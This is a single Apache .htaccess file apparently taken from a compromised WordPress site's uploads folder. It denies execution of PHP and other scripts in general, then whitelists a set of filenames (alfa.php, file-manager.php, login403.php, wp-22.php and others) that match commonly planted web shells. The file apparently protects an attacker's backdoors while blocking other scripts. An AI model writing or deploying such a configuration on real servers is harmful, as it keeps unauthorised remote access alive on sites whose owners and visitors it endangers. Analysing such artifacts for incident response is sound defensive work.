File: /var/www/html/wp-content/uploads/2024/03/.htaccess
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(alfa.php|login403.php|login404.php|login405.php|seothemes.php|elemantor.php|atom.php|file-manager.php|hader-css.php|index.php|hader.php|autoload_classmap.php|style.php|wp-22.php|root-css.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>